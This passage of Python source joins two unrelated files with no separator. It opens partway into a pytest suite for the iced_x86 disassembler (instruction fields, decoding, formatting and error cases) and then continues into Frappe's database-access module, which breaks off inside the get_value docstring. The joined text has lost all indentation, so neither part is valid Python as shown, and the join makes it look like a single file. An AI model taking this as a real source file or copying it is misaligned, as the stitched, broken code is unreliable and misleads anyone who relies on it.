assert instr.immediate(0) == 0x1234_5678
def test_near_br16():
instr = Instruction()
instr.op0_kind = OpKind.NEAR_BRANCH16
instr.near_branch16 = 0xFEDC
assert instr.near_branch16 == 0xFEDC
assert instr.near_branch_target == 0xFEDC
instr.near_branch16 = 0x1234
assert instr.near_branch16 == 0x1234
assert instr.near_branch_target == 0x1234
def test_near_br32():
instr = Instruction()
instr.op0_kind = OpKind.NEAR_BRANCH32
instr.near_branch32 = 0xFEDC_BA98
assert instr.near_branch32 == 0xFEDC_BA98
assert instr.near_branch_target == 0xFEDC_BA98
instr.near_branch32 = 0x1234_5678
assert instr.near_branch32 == 0x1234_5678
assert instr.near_branch_target == 0x1234_5678
def test_near_br64():
instr = Instruction()
instr.op0_kind = OpKind.NEAR_BRANCH64
instr.near_branch64 = 0xFEDC_BA98_7654_321F
assert instr.near_branch64 == 0xFEDC_BA98_7654_321F
assert instr.near_branch_target == 0xFEDC_BA98_7654_321F
instr.near_branch64 = 0x1234_5678_9ABC_DEF1
assert instr.near_branch64 == 0x1234_5678_9ABC_DEF1
assert instr.near_branch_target == 0x1234_5678_9ABC_DEF1
def test_far_br16():
instr = Instruction()
instr.op0_kind = OpKind.FAR_BRANCH16
instr.far_branch16 = 0x1234
instr.far_branch_selector = 0xABCD
assert instr.far_branch16 == 0x1234
assert instr.far_branch_selector == 0xABCD
instr.far_branch16 = 0xABCD
instr.far_branch_selector = 0x1234
assert instr.far_branch16 == 0xABCD
assert instr.far_branch_selector == 0x1234
def test_far_br32():
instr = Instruction()
instr.op0_kind = OpKind.FAR_BRANCH32
instr.far_branch32 = 0x1234_5678
instr.far_branch_selector = 0xABCD
assert instr.far_branch32 == 0x1234_5678
assert instr.far_branch_selector == 0xABCD
instr.far_branch32 = 0xABCD_EF01
instr.far_branch_selector = 0x1234
assert instr.far_branch32 == 0xABCD_EF01
assert instr.far_branch_selector == 0x1234
@pytest.mark.parametrize("data", [
[0x12],
[0x12, 0x34],
[0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88],
])
def test_db_u(data):
assert 1 <= len(data) <= 16
instr = Instruction()
instr.code = Code.DECLAREBYTE
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_byte_value(i, d)
for i, d in enumerate(data):
assert instr.get_declare_byte_value(i) == d
@pytest.mark.parametrize("data", [
[0x12],
[0x12, 0x34],
[0x12, 0x34, 0x56, 0x78, -0x12, -0x34, -0x56, -0x78, 0x11, 0x22, 0x33, 0x44, -0x11, -0x22, -0x33, -0x44],
])
def test_db_i(data):
assert 1 <= len(data) <= 16
instr = Instruction()
instr.code = Code.DECLAREBYTE
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_byte_value_i8(i, d)
for i, d in enumerate(data):
assert instr.get_declare_byte_value_i8(i) == d
@pytest.mark.parametrize("data", [
[0x1234],
[0x1234, 0x89AB],
[0x1234, 0x89AB, 0x4567, 0xCDEF, 0x1122, 0x8899, 0x3344, 0xAABB],
])
def test_dw_u(data):
assert 1 <= len(data) <= 8
instr = Instruction()
instr.code = Code.DECLAREWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_word_value(i, d)
for i, d in enumerate(data):
assert instr.get_declare_word_value(i) == d
@pytest.mark.parametrize("data", [
[0x1234],
[0x1234, -0x1234],
[0x1234, -0x1234, 0x4567, -0x4567, 0x1122, -0x1122, 0x3344, -0x3344],
])
def test_dw_i(data):
assert 1 <= len(data) <= 8
instr = Instruction()
instr.code = Code.DECLAREWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_word_value_i16(i, d)
for i, d in enumerate(data):
assert instr.get_declare_word_value_i16(i) == d
@pytest.mark.parametrize("data", [
[0x1234_5678],
[0x1234_5678, 0x89AB_CDEF],
[0x1234_5678, 0x9ABC_CDEF, 0x1122_3344, 0x8899_AABB],
])
def test_dd_u(data):
assert 1 <= len(data) <= 4
instr = Instruction()
instr.code = Code.DECLAREDWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_dword_value(i, d)
for i, d in enumerate(data):
assert instr.get_declare_dword_value(i) == d
@pytest.mark.parametrize("data", [
[0x1234_5678],
[0x1234_5678, -0x1234_5678],
[0x1234_5678, -0x1234_5678, 0x1122_3344, -0x1122_3344],
])
def test_dd_i(data):
assert 1 <= len(data) <= 4
instr = Instruction()
instr.code = Code.DECLAREDWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_dword_value_i32(i, d)
for i, d in enumerate(data):
assert instr.get_declare_dword_value_i32(i) == d
@pytest.mark.parametrize("data", [
[0x1234_5678_9ABC_DEF0],
[0x1234_5678_9ABC_DEF0, 0xABCD_EF01_2345_6789],
])
def test_dq_u(data):
assert 1 <= len(data) <= 2
instr = Instruction()
instr.code = Code.DECLAREQWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_qword_value(i, d)
for i, d in enumerate(data):
assert instr.get_declare_qword_value(i) == d
@pytest.mark.parametrize("data", [
[0x1234_5678_9ABC_DEF0],
[0x1234_5678_9ABC_DEF0, -0x1234_5678_9ABC_DEF0],
])
def test_dq_i(data):
assert 1 <= len(data) <= 2
instr = Instruction()
instr.code = Code.DECLAREQWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_qword_value_i64(i, d)
for i, d in enumerate(data):
assert instr.get_declare_qword_value_i64(i) == d
@pytest.mark.parametrize("bitness, data, vsib", [
(64, b"\x29\x18", 0),
(64, b"\xC4\xE2\x49\x90\x54\xA1\x01", 32),
(64, b"\xC4\xE2\x49\x91\x54\xA1\x01", 64),
])
def test_vsib(bitness, data, vsib):
instr = Decoder(bitness, data).decode()
if vsib == 0:
assert instr.vsib is None
assert not instr.is_vsib
assert not instr.is_vsib32
assert not instr.is_vsib64
elif vsib == 32:
assert instr.vsib is False
assert instr.is_vsib
assert instr.is_vsib32
assert not instr.is_vsib64
elif vsib == 64:
assert instr.vsib is True
assert instr.is_vsib
assert not instr.is_vsib32
assert instr.is_vsib64
else:
raise ValueError(f"Invalid vsib value: {vsib}")
def test_ip_rel_addr():
decoder = Decoder(64, b"\x00\x00" b"\x01\x35\x34\x12\x5A\xA5" b"\x67\x01\x35\x34\x12\x5A\xA5")
decoder.ip = 0x1234_5678_9ABC_DEF0
instr = decoder.decode()
assert not instr.is_ip_rel_memory_operand
instr = decoder.decode()
assert instr.is_ip_rel_memory_operand
assert instr.ip_rel_memory_address == 0x1234_5678_4016_F12C
instr = decoder.decode()
assert instr.is_ip_rel_memory_operand
assert instr.ip_rel_memory_address == 0x4016_F133
def test_sp_inc():
decoder = Decoder(64, b"\x90\x56\x5E")
instr = decoder.decode()
assert not instr.is_stack_instruction
assert instr.stack_pointer_increment == 0
instr = decoder.decode()
assert instr.is_stack_instruction
assert instr.stack_pointer_increment == -8
instr = decoder.decode()
assert instr.is_stack_instruction
assert instr.stack_pointer_increment == 8
@pytest.mark.parametrize("bitness, data, encoding", [
(64, b"\x56", EncodingKind.LEGACY),
(64, b"\xC5\xF8\x10\x10", EncodingKind.VEX),
(64, b"\x62\xF1\x7C\x08\x10\x50\x01", EncodingKind.EVEX),
(64, b"\x8F\xE8\x48\x85\x10\x40", EncodingKind.XOP),
(64, b"\x0F\x0F\x88\x34\x12\x5A\xA5\x0C", EncodingKind.D3NOW),
])
def test_encoding(bitness, data, encoding):
instr = Decoder(bitness, data).decode()
assert instr.encoding == encoding
def test_cpuid_features():
instr = Decoder(64, b"\x62\xF1\x7C\x08\x10\x50\x01").decode()
cpuid_features = instr.cpuid_features()
assert type(cpuid_features) == list
assert len(cpuid_features) == 2
assert set(cpuid_features) == set([CpuidFeature.AVX512VL, CpuidFeature.AVX512F])
def test_cflow():
decoder = Decoder(64, b"\x90\xCC\x70\x00")
assert decoder.decode().flow_control == FlowControl.NEXT
assert decoder.decode().flow_control == FlowControl.INTERRUPT
assert decoder.decode().flow_control == FlowControl.CONDITIONAL_BRANCH
def test_rflags():
decoder = Decoder(64, b"\x33\xC0")
instr = decoder.decode()
assert instr.rflags_read == RflagsBits.NONE
assert instr.rflags_written == RflagsBits.NONE
assert instr.rflags_cleared == RflagsBits.OF | RflagsBits.SF | RflagsBits.CF
assert instr.rflags_set == RflagsBits.ZF | RflagsBits.PF
assert instr.rflags_undefined == RflagsBits.AF
assert instr.rflags_modified == RflagsBits.OF | RflagsBits.SF | RflagsBits.ZF | RflagsBits.AF | RflagsBits.CF | RflagsBits.PF
def test_br_checks():
instr = Decoder(64, b"\x70\x00").decode()
assert instr.is_jcc_short_or_near
assert instr.is_jcc_short
assert not instr.is_jcc_near
instr = Decoder(64, b"\x0F\x80\x00\x00\x00\x00").decode()
assert instr.is_jcc_short_or_near
assert not instr.is_jcc_short
assert instr.is_jcc_near
instr = Decoder(64, b"\xEB\x00").decode()
assert instr.is_jmp_short_or_near
assert instr.is_jmp_short
assert not instr.is_jmp_near
instr = Decoder(64, b"\xE9\x00\x00\x00\x00").decode()
assert instr.is_jmp_short_or_near
assert not instr.is_jmp_short
assert instr.is_jmp_near
instr = Decoder(32, b"\xEA\x00\x00\x00\x00\x00\x00").decode()
assert instr.is_jmp_far
assert not instr.is_call_far
assert not instr.is_jmp_far_indirect
assert not instr.is_call_far_indirect
instr = Decoder(32, b"\x9A\x00\x00\x00\x00\x00\x00").decode()
assert not instr.is_jmp_far
assert instr.is_call_far
assert not instr.is_jmp_far_indirect
assert not instr.is_call_far_indirect
instr = Decoder(64, b"\x48\xFF\x28").decode()
assert not instr.is_jmp_far
assert not instr.is_call_far
assert instr.is_jmp_far_indirect
assert not instr.is_call_far_indirect
instr = Decoder(64, b"\x48\xFF\x18").decode()
assert not instr.is_jmp_far
assert not instr.is_call_far
assert not instr.is_jmp_far_indirect
assert instr.is_call_far_indirect
instr = Decoder(64, b"\xE8\x00\x00\x00\x00").decode()
assert instr.is_call_near
assert not instr.is_jmp_near_indirect
assert not instr.is_call_near_indirect
instr = Decoder(64, b"\xFF\x20").decode()
assert not instr.is_call_near
assert instr.is_jmp_near_indirect
assert not instr.is_call_near_indirect
instr = Decoder(64, b"\xFF\x10").decode()
assert not instr.is_call_near
assert not instr.is_jmp_near_indirect
assert instr.is_call_near_indirect
def test_condition_code():
instr = Decoder(64, b"\x70\x00").decode()
assert instr.condition_code == ConditionCode.O
instr.negate_condition_code()
assert instr.condition_code == ConditionCode.NO
def test_short_near_br():
instr = Decoder(64, b"\x70\x00").decode()
assert instr.code == Code.JO_REL8_64
instr.as_short_branch()
assert instr.code == Code.JO_REL8_64
instr.as_near_branch()
assert instr.code == Code.JO_REL32_64
instr.as_near_branch()
assert instr.code == Code.JO_REL32_64
def test_op_code():
instr = Decoder(64, b"\x70\x00").decode()
idef1 = instr.op_code()
assert idef1.code == Code.JO_REL8_64
assert idef1 == OpCodeInfo(Code.JO_REL8_64)
def test_repr_str():
instr = Decoder(64, b"\x48\x05\xA5\x5A\x34\x82").decode()
assert repr(instr) == "add rax,0FFFFFFFF82345AA5h"
assert str(instr) == "add rax,0FFFFFFFF82345AA5h"
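# Reference for the format specs exercised below (matching the asserts; see
# iced_x86's __format__ docs): f/g/i/m/n select the Fast, gas (AT&T),
# Intel (XED), masm and nasm formatters; x/X and h/H pick lowercase/uppercase
# hex with a 0x prefix or an h suffix; U uppercases mnemonics and registers,
# s adds a space after operand separators, _ inserts digit separators, r keeps
# RIP-relative addresses, S always shows the segment, M always shows the
# memory size, B drops the branch size, and G adds the gas size suffix.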
def test_format():
decoder = Decoder(64, b"\x48\x05\xA5\x5A\x34\x82" b"\x48\x8B\x05\x88\xA9\xCB\xED" b"\x70\x00")
decoder.ip = 0x1234_5678_9ABC_DEF0
instr = decoder.decode()
assert f"{instr}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:f}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:g}" == "add $0xFFFFFFFF82345AA5,%rax"
assert f"{instr:i}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:m}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:n}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:x}" == "add rax,0xffffffff82345aa5"
assert f"{instr:X}" == "add rax,0xFFFFFFFF82345AA5"
assert f"{instr:h}" == "add rax,0ffffffff82345aa5h"
assert f"{instr:H}" == "add rax,0FFFFFFFF82345AA5h"
assert f"{instr:Uh}" == "ADD RAX,0ffffffff82345aa5h"
assert f"{instr:s}" == "add rax, 0FFFFFFFF82345AA5h"
assert f"{instr:gG}" == "addq $0xFFFFFFFF82345AA5,%rax"
assert f"{instr:_}" == "add rax,0_FFFF_FFFF_8234_5AA5h"
assert f"{instr:ixUs_}" == "ADD RAX, 0xffff_ffff_8234_5aa5"
instr = decoder.decode()
assert f"{instr}" == "mov rax,[1234567888888885h]"
assert f"{instr:r}" == "mov rax,[rip-12345678h]"
assert f"{instr:S}" == "mov rax,ds:[1234567888888885h]"
assert f"{instr:M}" == "mov rax,qword ptr [1234567888888885h]"
instr = decoder.decode()
assert f"{instr}" == "jo short 123456789ABCDEFFh"
assert f"{instr:B}" == "jo 123456789ABCDEFFh"
def test_format_raise():
instr = Decoder(64, b"\x48\x05\xA5\x5A\x34\x82").decode()
with pytest.raises(ValueError):
f"{instr:!}"
def test_op_kind_raise():
instr = Instruction()
with pytest.raises(ValueError):
instr.op_kind(100)
with pytest.raises(ValueError):
instr.set_op_kind(100, OpKind.REGISTER)
with pytest.raises(ValueError):
instr.set_op_kind(0, 12345)
def test_op_register_raise():
instr = Instruction()
with pytest.raises(ValueError):
instr.op_register(100)
with pytest.raises(ValueError):
instr.set_op_register(100, Register.RAX)
with pytest.raises(ValueError):
instr.set_op_register(0, 12345)
def test_immediate_raise():
instr = Instruction()
not_imm_op_kinds = [
OpKind.REGISTER,
OpKind.NEAR_BRANCH16,
OpKind.NEAR_BRANCH32,
OpKind.NEAR_BRANCH64,
OpKind.FAR_BRANCH16,
OpKind.FAR_BRANCH32,
OpKind.MEMORY_SEG_SI,
OpKind.MEMORY_SEG_ESI,
OpKind.MEMORY_SEG_RSI,
OpKind.MEMORY_SEG_DI,
OpKind.MEMORY_SEG_EDI,
OpKind.MEMORY_SEG_RDI,
OpKind.MEMORY_ESDI,
OpKind.MEMORY_ESEDI,
OpKind.MEMORY_ESRDI,
OpKind.MEMORY64,
OpKind.MEMORY,
]
imm_op_kinds = [
OpKind.IMMEDIATE8,
OpKind.IMMEDIATE8_2ND,
OpKind.IMMEDIATE16,
OpKind.IMMEDIATE32,
OpKind.IMMEDIATE64,
OpKind.IMMEDIATE8TO16,
OpKind.IMMEDIATE8TO32,
OpKind.IMMEDIATE8TO64,
OpKind.IMMEDIATE32TO64,
]
for kind in not_imm_op_kinds:
instr.op0_kind = kind
with pytest.raises(ValueError):
instr.immediate(0)
with pytest.raises(ValueError):
instr.set_immediate_i32(0, 0)
with pytest.raises(ValueError):
instr.set_immediate_u32(0, 0)
with pytest.raises(ValueError):
instr.set_immediate_i64(0, 0)
with pytest.raises(ValueError):
instr.set_immediate_u64(0, 0)
for kind in imm_op_kinds:
instr.op0_kind = kind
instr.immediate(0)
instr.set_immediate_i32(0, 0)
instr.set_immediate_u32(0, 0)
instr.set_immediate_i64(0, 0)
instr.set_immediate_u64(0, 0)
instr.op0_kind = OpKind.IMMEDIATE8
instr.immediate(0)
with pytest.raises(ValueError):
instr.immediate(100)
with pytest.raises(ValueError):
instr.set_immediate_i32(100, 0)
with pytest.raises(ValueError):
instr.set_immediate_u32(100, 0)
with pytest.raises(ValueError):
instr.set_immediate_i64(100, 0)
with pytest.raises(ValueError):
instr.set_immediate_u64(100, 0)
def test_db_raise():
instr = Instruction()
instr.code = Code.DECLAREBYTE
NUM = 16
instr.set_declare_byte_value_i8(NUM - 1, 0)
instr.set_declare_byte_value(NUM - 1, 0)
instr.get_declare_byte_value(NUM - 1)
instr.get_declare_byte_value_i8(NUM - 1)
with pytest.raises(ValueError):
instr.set_declare_byte_value_i8(NUM, 0)
with pytest.raises(ValueError):
instr.set_declare_byte_value(NUM, 0)
with pytest.raises(ValueError):
instr.get_declare_byte_value(NUM)
with pytest.raises(ValueError):
instr.get_declare_byte_value_i8(NUM)
def test_dw_raise():
instr = Instruction()
instr.code = Code.DECLAREWORD
NUM = 8
instr.set_declare_word_value_i16(NUM - 1, 0)
instr.set_declare_word_value(NUM - 1, 0)
instr.get_declare_word_value(NUM - 1)
instr.get_declare_word_value_i16(NUM - 1)
with pytest.raises(ValueError):
instr.set_declare_word_value_i16(NUM, 0)
with pytest.raises(ValueError):
instr.set_declare_word_value(NUM, 0)
with pytest.raises(ValueError):
instr.get_declare_word_value(NUM)
with pytest.raises(ValueError):
instr.get_declare_word_value_i16(NUM)
def test_dd_raise():
instr = Instruction()
instr.code = Code.DECLAREDWORD
NUM = 4
instr.set_declare_dword_value_i32(NUM - 1, 0)
instr.set_declare_dword_value(NUM - 1, 0)
instr.get_declare_dword_value(NUM - 1)
instr.get_declare_dword_value_i32(NUM - 1)
with pytest.raises(ValueError):
instr.set_declare_dword_value_i32(NUM, 0)
with pytest.raises(ValueError):
instr.set_declare_dword_value(NUM, 0)
with pytest.raises(ValueError):
instr.get_declare_dword_value(NUM)
with pytest.raises(ValueError):
instr.get_declare_dword_value_i32(NUM)
def test_dq_raise():
instr = Instruction()
instr.code = Code.DECLAREQWORD
NUM = 2
instr.set_declare_qword_value_i64(NUM - 1, 0)
instr.set_declare_qword_value(NUM - 1, 0)
instr.get_declare_qword_value(NUM - 1)
instr.get_declare_qword_value_i64(NUM - 1)
with pytest.raises(ValueError):
instr.set_declare_qword_value_i64(NUM, 0)
with pytest.raises(ValueError):
instr.set_declare_qword_value(NUM, 0)
with pytest.raises(ValueError):
instr.get_declare_qword_value(NUM)
with pytest.raises(ValueError):
instr.get_declare_qword_value_i64(NUM)
def test_code_size_raise():
instr = Instruction()
instr.code_size = CodeSize.CODE64
with pytest.raises(ValueError):
instr.code_size = 1234
def test_code_raise():
instr = Instruction()
instr.code = Code.EVEX_VAESENCLAST_ZMM_ZMM_ZMMM512
with pytest.raises(ValueError):
instr.code = 10000
def test_segment_prefix_raise():
instr = Instruction()
instr.segment_prefix = Register.FS
with pytest.raises(ValueError):
instr.segment_prefix = 1234
def test_memory_base_raise():
instr = Instruction()
instr.memory_base = Register.RAX
with pytest.raises(ValueError):
instr.memory_base = 1234
def test_memory_index_raise():
instr = Instruction()
instr.memory_index = Register.RAX
with pytest.raises(ValueError):
instr.memory_index = 1234
def test_op_register_set_raise():
instr = Instruction()
instr.op0_register = Register.RAX
with pytest.raises(ValueError):
instr.op0_register = 1234
instr.set_op_register(0, Register.RAX)
with pytest.raises(ValueError):
instr.set_op_register(0, 1234)
instr.op1_register = Register.RAX
with pytest.raises(ValueError):
instr.op1_register = 1234
instr.set_op_register(1, Register.RAX)
with pytest.raises(ValueError):
instr.set_op_register(1, 1234)
instr.op2_register = Register.RAX
with pytest.raises(ValueError):
instr.op2_register = 1234
instr.set_op_register(2, Register.RAX)
with pytest.raises(ValueError):
instr.set_op_register(2, 1234)
instr.op3_register = Register.RAX
with pytest.raises(ValueError):
instr.op3_register = 1234
instr.set_op_register(3, Register.RAX)
with pytest.raises(ValueError):
instr.set_op_register(3, 1234)
instr.op4_register = Register.NONE
with pytest.raises(ValueError):
instr.op4_register = 1234
instr.set_op_register(4, Register.NONE)
with pytest.raises(ValueError):
instr.set_op_register(4, 1234)
def test_op_mask_raise():
instr = Instruction()
instr.op_mask = Register.K1
with pytest.raises(ValueError):
instr.op_mask = 1234
def test_fpu_stack_increment_info():
instr = Decoder(64, b"\xDA\x18").decode()
info = instr.fpu_stack_increment_info()
assert info.increment == 1
assert not info.conditional
assert info.writes_top
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# Database Module
# --------------------
from __future__ import unicode_literals
import re
import time
import frappe
import datetime
import frappe.defaults
import frappe.model.meta
from frappe import _
from time import time
from frappe.utils import now, getdate, cast_fieldtype, get_datetime
from frappe.utils.background_jobs import execute_job, get_queue
from frappe.model.utils.link_count import flush_local_link_count
from frappe.utils import cint
# imports - compatibility imports
from six import (
integer_types,
string_types,
text_type,
iteritems
)
class Database(object):
"""
Open a database connection with the given parameters; if use_default is True, use the
login details from `conf.py`. This is called by the request handler and is accessible using
the `db` global variable. The `sql` method is also available globally to run queries.
"""
VARCHAR_LEN = 140
MAX_COLUMN_LENGTH = 64
OPTIONAL_COLUMNS = ["_user_tags", "_comments", "_assign", "_liked_by"]
DEFAULT_SHORTCUTS = ['_Login', '__user', '_Full Name', 'Today', '__today', "now", "Now"]
STANDARD_VARCHAR_COLUMNS = ('name', 'owner', 'modified_by', 'parent', 'parentfield', 'parenttype')
DEFAULT_COLUMNS = ['name', 'creation', 'modified', 'modified_by', 'owner', 'docstatus', 'parent',
'parentfield', 'parenttype', 'idx']
class InvalidColumnName(frappe.ValidationError): pass
def __init__(self, host=None, user=None, password=None, ac_name=None, use_default=0, port=None):
self.setup_type_map()
self.host = host or frappe.conf.db_host or '127.0.0.1'
self.port = port or frappe.conf.db_port or ''
self.user = user or frappe.conf.db_name
self.db_name = frappe.conf.db_name
self._conn = None
if ac_name:
self.user = ac_name or frappe.conf.db_name
if use_default:
self.user = frappe.conf.db_name
self.transaction_writes = 0
self.auto_commit_on_many_writes = 0
self.password = password or frappe.conf.db_password
self.value_cache = {}
def setup_type_map(self):
pass
def connect(self):
"""Connects to a database as set in `site_config.json`."""
self.cur_db_name = self.user
self._conn = self.get_connection()
self._cursor = self._conn.cursor()
frappe.local.rollback_observers = []
def use(self, db_name):
"""`USE` db_name."""
self._conn.select_db(db_name)
def get_connection(self):
pass
def get_database_size(self):
pass
def sql(self, query, values=(), as_dict = 0, as_list = 0, formatted = 0,
debug=0, ignore_ddl=0, as_utf8=0, auto_commit=0, update=None, explain=False):
"""Execute a SQL query and fetch all rows.
:param query: SQL query.
:param values: List / dict of values to be escaped and substituted in the query.
:param as_dict: Return as a dictionary.
:param as_list: Always return as a list.
:param formatted: Format values like date etc.
:param debug: Print query and `EXPLAIN` in debug log.
:param ignore_ddl: Catch exception if table, column missing.
:param as_utf8: Encode values as UTF 8.
:param auto_commit: Commit after executing the query.
:param update: Update this dict to all rows (if returned `as_dict`).
:param explain: With `debug`, also print the `EXPLAIN` plan for select queries.
Examples:
# return customer names as dicts
frappe.db.sql("select name from tabCustomer", as_dict=True)
# return names beginning with a
frappe.db.sql("select name from tabCustomer where name like %s", "a%")
# values as dict
frappe.db.sql("select name from tabCustomer where name like %(name)s and owner=%(owner)s",
{"name": "a%", "owner":"test@example.com"})
"""
if re.search(r'ifnull\(', query, flags=re.IGNORECASE):
# replaces ifnull in query with coalesce
query = re.sub(r'ifnull\(', 'coalesce(', query, flags=re.IGNORECASE)
if not self._conn:
self.connect()
# in transaction validations
self.check_transaction_status(query)
self.clear_db_table_cache(query)
# autocommit
if auto_commit: self.commit()
# execute
try:
if debug:
time_start = time()
self.log_query(query, values, debug, explain)
if values!=():
if isinstance(values, dict):
values = dict(values)
# MySQL-python==1.2.5 hack!
if not isinstance(values, (dict, tuple, list)):
values = (values,)
self._cursor.execute(query, values)
if frappe.flags.in_migrate:
self.log_touched_tables(query, values)
else:
self._cursor.execute(query)
if frappe.flags.in_migrate:
self.log_touched_tables(query)
if debug:
time_end = time()
frappe.errprint(("Execution time: {0} sec").format(round(time_end - time_start, 2)))
except Exception as e:
if frappe.conf.db_type == 'postgres':
self.rollback()
elif self.is_syntax_error(e):
# only for mariadb
frappe.errprint('Syntax error in query:')
frappe.errprint(query)
if ignore_ddl and (self.is_missing_column(e) or self.is_missing_table(e) or self.cant_drop_field_or_key(e)):
pass
else:
raise
if auto_commit: self.commit()
if not self._cursor.description:
return ()
# scrub output if required
if as_dict:
ret = self.fetch_as_dict(formatted, as_utf8)
if update:
for r in ret:
r.update(update)
return ret
elif as_list:
return self.convert_to_lists(self._cursor.fetchall(), formatted, as_utf8)
elif as_utf8:
return self.convert_to_lists(self._cursor.fetchall(), formatted, as_utf8)
else:
return self._cursor.fetchall()
def log_query(self, query, values, debug, explain):
# for debugging in tests
if frappe.conf.get('allow_tests') and frappe.cache().get_value('flag_print_sql'):
print(self.mogrify(query, values))
# debug
if debug:
if explain and query.strip().lower().startswith('select'):
self.explain_query(query, values)
frappe.errprint(self.mogrify(query, values))
# info
if (frappe.conf.get("logging") or False)==2:
frappe.log("<<<< query")
frappe.log(self.mogrify(query, values))
frappe.log(">>>>")
def mogrify(self, query, values):
'''build the query string with values'''
if not values:
return query
else:
try:
return self._cursor.mogrify(query, values)
except: # noqa: E722
return (query, values)
def explain_query(self, query, values=None):
"""Print `EXPLAIN` in error log."""
try:
frappe.errprint("--- query explain ---")
if values is None:
self._cursor.execute("explain " + query)
else:
self._cursor.execute("explain " + query, values)
import json
frappe.errprint(json.dumps(self.fetch_as_dict(), indent=1))
frappe.errprint("--- query explain end ---")
except Exception:
frappe.errprint("error in query explain")
def sql_list(self, query, values=(), debug=False):
"""Return data as list of single elements (first column).
Example:
# doctypes = ["DocType", "DocField", "User", ...]
doctypes = frappe.db.sql_list("select name from tabDocType")
"""
return [r[0] for r in self.sql(query, values, debug=debug)]
def sql_ddl(self, query, values=(), debug=False):
"""Commit and execute a query. DDL (Data Definition Language) queries that alter schema
autocommit in MariaDB."""
self.commit()
self.sql(query, debug=debug)
def check_transaction_status(self, query):
"""Raises exception if more than 20,000 `INSERT`, `UPDATE` queries are
executed in one transaction. This is to ensure that writes are always flushed otherwise this
could cause the system to hang."""
if self.transaction_writes and \
query and query.strip().split()[0].lower() in ['start', 'alter', 'drop', 'create', "begin", "truncate"]:
raise Exception('This statement can cause implicit commit')
if query and query.strip().lower() in ('commit', 'rollback'):
self.transaction_writes = 0
if query[:6].lower() in ('update', 'insert', 'delete'):
self.transaction_writes += 1
if self.transaction_writes > 200000:
if self.auto_commit_on_many_writes:
self.commit()
else:
frappe.throw(_("Too many writes in one request. Please send smaller requests"), frappe.ValidationError)
def fetch_as_dict(self, formatted=0, as_utf8=0):
"""Internal. Converts results to dict."""
result = self._cursor.fetchall()
ret = []
if result:
keys = [column[0] for column in self._cursor.description]
for r in result:
values = []
for value in r:
if as_utf8 and isinstance(value, text_type):
value = value.encode('utf-8')
values.append(value)
ret.append(frappe._dict(zip(keys, values)))
return ret
@staticmethod
def clear_db_table_cache(query):
if query and query.strip().split()[0].lower() in {'drop', 'create'}:
frappe.cache().delete_key('db_tables')
@staticmethod
def needs_formatting(result, formatted):
"""Returns true if the first row in the result has a Date, Datetime, Long Int."""
if result and result[0]:
for v in result[0]:
if isinstance(v, (datetime.date, datetime.timedelta, datetime.datetime, integer_types)):
return True
if formatted and isinstance(v, (int, float)):
return True
return False
def get_description(self):
"""Returns result metadata."""
return self._cursor.description
@staticmethod
def convert_to_lists(res, formatted=0, as_utf8=0):
"""Convert tuple output to lists (internal)."""
nres = []
for r in res:
nr = []
for val in r:
if as_utf8 and isinstance(val, text_type):
val = val.encode('utf-8')
nr.append(val)
nres.append(nr)
return nres
@staticmethod
def build_conditions(filters):
"""Convert filters sent as dict, lists to SQL conditions. filter's key
is passed by map function, build conditions like:
* ifnull(`fieldname`, default_value) = %(fieldname)s
* `fieldname` [=, !=, >, >=, <, <=] %(fieldname)s
"""
conditions = []
values = {}
def _build_condition(key):
"""
filter's key is passed by map function
build conditions like:
* ifnull(`fieldname`, default_value) = %(fieldname)s
* `fieldname` [=, !=, >, >=, <, <=] %(fieldname)s
"""
_operator = "="
_rhs = " %(" + key + ")s"
value = filters.get(key)
values[key] = value
if isinstance(value, (list, tuple)):
# value is a tuple like ("!=", 0)
_operator = value[0]
values[key] = value[1]
if isinstance(value[1], (tuple, list)):
# value is a list in tuple ("in", ("A", "B"))
inner_list = []
for i, v in enumerate(value[1]):
inner_key = "{0}_{1}".format(key, i)
values[inner_key] = v
inner_list.append("%({0})s".format(inner_key))
_rhs = " ({0})".format(", ".join(inner_list))
del values[key]
if _operator not in ["=", "!=", ">", ">=", "<", "<=", "like", "in", "not in", "not like"]:
_operator = "="
if "[" in key:
split_key = key.split("[")
condition = "coalesce(`" + split_key[0] + "`, " + split_key[1][:-1] + ") " \
+ _operator + _rhs
else:
condition = "`" + key + "` " + _operator + _rhs
conditions.append(condition)
if isinstance(filters, int):
# docname is a number, convert to string
filters = str(filters)
if isinstance(filters, string_types):
filters = { "name": filters }
for f in filters:
_build_condition(f)
return " and ".join(conditions), values
def get(self, doctype, filters=None, as_dict=True, cache=False):
"""Returns `get_value` with fieldname='*'"""
return self.get_value(doctype, filters, "*", as_dict=as_dict, cache=cache)
def get_value(self, doctype, filters=None, fieldname="name", ignore=None, as_dict=False,
debug=False, order_by=None, cache=False, for_update=False):
"""Returns a document property or list of properties.
:param doctype: DocType name.
:param filters: Filters like `{"x":"y"}` or name of the document. `None` if Single DocType.
:param fieldname: Column name.
:param ignore: Don't raise exception if table, column is missing.
:param as_dict: Return values as dict.
:param debug: Print query in error log.
:param order_by: Column to order by
Example:
# return first customer starting with a
frappe.db.get_value("Customer", {"name": ("like a%")})
# return last login of **User** `test@example.com`
frappe.db.get_value("User", "test@example.com", "last_login")
last_login, last_ip = frappe.db.get_value("User", "test@example.com",
["last_login", "last_ip"])
